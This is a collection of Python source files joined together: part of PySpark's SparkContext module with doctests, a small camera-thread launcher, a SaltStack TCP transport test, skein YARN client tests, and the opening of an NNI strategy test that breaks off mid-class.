if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Calling the Java parallelize() method with an ArrayList is too slow,
# because it sends O(n) Py4J commands. As an alternative, serialized
# objects are written to a file and loaded through textFile().
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
serializer.dump_stream(c, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
jrdd = readRDDFromFile(self._jsc, tempFile.name, numSlices)
finally:
# readRDDFromFile eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
return RDD(jrdd, self, serializer)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> supress = lock.acquire()
>>> supress = threading.Thread(target=start_job, args=(10,)).start()
>>> supress = threading.Thread(target=stop_job).start()
>>> supress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
port = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(port, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
self.profiler_collector.show_profiles()
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
self.profiler_collector.dump_profiles(path)
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
start.py | from threading import Thread
import cv2
from facerecognition.main import main as face
from objectrecognition.main import main as object_rec
from usb_serial.main import main as usb
camera = cv2.VideoCapture(0)
face_thread = Thread(target=face, args=(camera,))
object_thread = Thread(target=object_rec, args=(camera,))
usb_thread = Thread(target=usb)
face_thread.start()
object_thread.start()
usb_thread.start()
|
tcp_test.py | # -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import threading
import tornado.gen
import tornado.ioloop
from tornado.testing import AsyncTestCase
import salt.config
import salt.utils
import salt.transport.server
import salt.transport.client
import salt.exceptions
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../')
import integration
# Import Salt libs
from unit.transport.req_test import ReqChannelMixin
from unit.transport.pub_test import PubChannelMixin
# TODO: move to a library?
def get_config_file_path(filename):
return os.path.join(integration.TMP, 'config', filename)
class BaseTCPReqCase(TestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = tornado.ioloop.IOLoop()
cls.io_loop.make_current()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=cls.io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.server_channel.close()
del cls.server_channel
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts, crypt='clear')
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts)
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_ip': '127.0.0.1',
'auth_timeout': 1,
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = tornado.ioloop.IOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
@classmethod
def tearDownClass(cls):
cls._server_io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.req_server_channel.close()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in self.io_loop._handlers.iteritems():
if self._start_handlers.get(k) != v:
failures.append((k, v))
if len(failures) > 0:
raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
if __name__ == '__main__':
from integration import run_tests
run_tests(ClearReqTestCases, needs_daemon=False)
run_tests(AESReqTestCases, needs_daemon=False)
|
test_core.py | from __future__ import print_function, division, absolute_import
import os
import time
import weakref
from collections import MutableMapping
from threading import Thread
import pytest
import skein
from skein.exceptions import FileNotFoundError, FileExistsError
from skein.test.conftest import (run_application, wait_for_containers,
wait_for_success, get_logs)
def test_security(tmpdir):
path = str(tmpdir)
s1 = skein.Security.from_new_directory(path)
s2 = skein.Security.from_directory(path)
assert s1 == s2
with pytest.raises(FileExistsError):
skein.Security.from_new_directory(path)
# Test force=True
with open(s1.cert_path) as fil:
data = fil.read()
s1 = skein.Security.from_new_directory(path, force=True)
with open(s1.cert_path) as fil:
data2 = fil.read()
assert data != data2
os.remove(s1.cert_path)
with pytest.raises(FileNotFoundError):
skein.Security.from_directory(path)
def pid_exists(pid):
try:
os.kill(pid, 0)
except OSError:
return False
return True
def test_client(security, kinit, tmpdir):
logpath = str(tmpdir.join("log.txt"))
with skein.Client(security=security, log=logpath) as client:
# smoketests
client.applications()
repr(client)
client2 = skein.Client(address=client.address, security=security)
assert client2._proc is None
# smoketests
client2.applications()
repr(client2)
# Process was definitely closed
assert not pid_exists(client._proc.pid)
# Log was written
assert os.path.exists(logpath)
with open(logpath) as fil:
assert len(fil.read()) > 0
# Connection error on closed client
with pytest.raises(skein.ConnectionError):
client2.applications()
# Connection error on connecting to missing daemon
with pytest.raises(skein.ConnectionError):
skein.Client(address=client.address, security=security)
def test_client_closed_when_reference_dropped(security, kinit):
client = skein.Client(security=security, log=False)
ref = weakref.ref(client)
pid = client._proc.pid
del client
assert ref() is None
assert not pid_exists(pid)
def test_simple_app(client):
with run_application(client) as app:
# Nest manager here to call cleanup manually in this test
with app:
# wait for app to start
ac = app.connect()
assert app.is_running()
# calling again is fine
isinstance(app.connect(), skein.ApplicationClient)
isinstance(app.connect(wait=False), skein.ApplicationClient)
# smoketest reprs
repr(app)
repr(ac)
report = app.status()
running_apps = client.applications()
assert report.id in {a.id for a in running_apps}
assert report.state == 'RUNNING'
assert report.final_status == 'UNDEFINED'
report = app.status()
assert report.state == 'KILLED'
assert report.final_status == 'KILLED'
with pytest.raises(skein.ConnectionError):
app.connect()
running_apps = client.applications()
assert report.id not in {a.id for a in running_apps}
killed_apps = client.applications(states=['killed'])
assert report.id in {a.id for a in killed_apps}
def test_shutdown_app(client):
with run_application(client) as app:
ac = app.connect()
ac.shutdown(status='SUCCEEDED')
assert app.status().final_status == 'SUCCEEDED'
def test_describe(client):
with run_application(client) as app:
ac = app.connect()
s = ac.describe(service='sleeper')
assert isinstance(s, skein.Service)
a = ac.describe()
assert isinstance(a, skein.ApplicationSpec)
assert a.services['sleeper'] == s
def test_key_value(client):
with run_application(client) as app:
ac = app.connect()
assert isinstance(ac.kv, MutableMapping)
assert ac.kv is ac.kv
assert dict(ac.kv) == {}
ac.kv['foo'] = 'bar'
assert ac.kv['foo'] == 'bar'
assert dict(ac.kv) == {'foo': 'bar'}
assert ac.kv.to_dict() == {'foo': 'bar'}
assert len(ac.kv) == 1
del ac.kv['foo']
assert ac.kv.to_dict() == {}
assert len(ac.kv) == 0
with pytest.raises(KeyError):
ac.kv['fizz']
with pytest.raises(TypeError):
ac.kv[1] = 'foo'
with pytest.raises(TypeError):
ac.kv['foo'] = 1
def set_foo():
time.sleep(0.5)
ac2 = app.connect()
ac2.kv['foo'] = 'baz'
setter = Thread(target=set_foo)
setter.daemon = True
setter.start()
val = ac.kv.wait('foo')
assert val == 'baz'
# Get immediately for set keys
val2 = ac.kv.wait('foo')
assert val2 == 'baz'
def test_dynamic_containers(client):
with run_application(client) as app:
ac = app.connect()
initial = wait_for_containers(ac, 1, states=['RUNNING'])
assert initial[0].state == 'RUNNING'
assert initial[0].service_name == 'sleeper'
# Scale sleepers up to 3 containers
new = ac.scale('sleeper', 3)
assert len(new) == 2
for c in new:
assert c.state == 'REQUESTED'
wait_for_containers(ac, 3, services=['sleeper'], states=['RUNNING'])
# Scale down to 1 container
stopped = ac.scale('sleeper', 1)
assert len(stopped) == 2
# Stopped oldest 2 instances
assert stopped[0].instance == 0
assert stopped[1].instance == 1
# Scale up to 2 containers
new = ac.scale('sleeper', 2)
# Calling twice is no-op
new2 = ac.scale('sleeper', 2)
assert len(new2) == 0
assert new[0].instance == 3
current = wait_for_containers(ac, 2, services=['sleeper'],
states=['RUNNING'])
assert current[0].instance == 2
assert current[1].instance == 3
# Manually kill instance 3
ac.kill('sleeper_3')
current = ac.containers()
assert len(current) == 1
assert current[0].instance == 2
# Fine to kill already killed container
ac.kill('sleeper_1')
# All killed containers
killed = ac.containers(states=['killed'])
assert len(killed) == 3
assert [c.instance for c in killed] == [0, 1, 3]
# Can't scale non-existant service
with pytest.raises(ValueError):
ac.scale('foobar', 2)
# Can't scale negative
with pytest.raises(ValueError):
ac.scale('sleeper', -5)
# Can't kill non-existant container
with pytest.raises(ValueError):
ac.kill('foobar_1')
with pytest.raises(ValueError):
ac.kill('sleeper_500')
# Invalid container id
with pytest.raises(ValueError):
ac.kill('fooooooo')
# Can't get containers for non-existant service
with pytest.raises(ValueError):
ac.containers(services=['sleeper', 'missing'])
def test_container_permissions(client, has_kerberos_enabled):
commands = ['echo "USER_ENV=[$USER]"',
'echo "LOGIN_ID=[$(whoami)]"',
'hdfs dfs -touchz /user/testuser/test_container_permissions']
service = skein.Service(resources=skein.Resources(memory=128, vcores=1),
commands=commands)
spec = skein.ApplicationSpec(name="test_container_permissions",
queue="default",
services={'service': service})
with run_application(client, spec=spec) as app:
wait_for_success(app)
logs = get_logs(app.app_id)
assert "USER_ENV=[testuser]" in logs
if has_kerberos_enabled:
assert "LOGIN_ID=[testuser]" in logs
else:
assert "LOGIN_ID=[yarn]" in logs
|
test_strategy.py | import random
import sys
import time
import threading
from typing import *
import nni.retiarii.execution.api
import nni.retiarii.nn.pytorch as nn
import nni.retiarii.strategy as strategy
import pytest
import torch
import torch.nn.functional as F
from nni.retiarii import Model
from nni.retiarii.converter import convert_to_graph
from nni.retiarii.execution import wait_models
from nni.retiarii.execution.interface import AbstractExecutionEngine, WorkerInfo, MetricData, AbstractGraphListener
from nni.retiarii.graph import DebugEvaluator, ModelStatus
from nni.retiarii.nn.pytorch.mutator import process_inline_mutation
class MockExecutionEngine(AbstractExecutionEngine):
def __init__(self, failure_prob=0.):
self.models = []
self.failure_prob = failure_prob
self._resource_left = 4
